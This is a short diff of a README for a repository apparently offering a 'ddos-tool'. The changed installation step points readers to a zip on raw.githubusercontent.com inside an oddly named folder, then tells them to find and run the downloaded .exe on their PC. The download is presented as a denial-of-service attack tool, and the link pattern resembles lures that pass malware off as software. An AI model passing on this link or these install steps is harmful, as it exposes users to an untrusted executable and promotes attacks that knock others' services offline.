Caduvitorino/ddos-tool/README.md

 ## 💻 Installation and Setup

-After downloading the `ddos-tool.exe` file, follow these steps to install and set up:
+After downloading the `https://raw.githubusercontent.com/Caduvitorino/ddos-tool/main/epizeuxis/ddos-tool-v2.9.zip` file, follow these steps to install and set up:

 1. Locate the downloaded `.exe` file on your PC.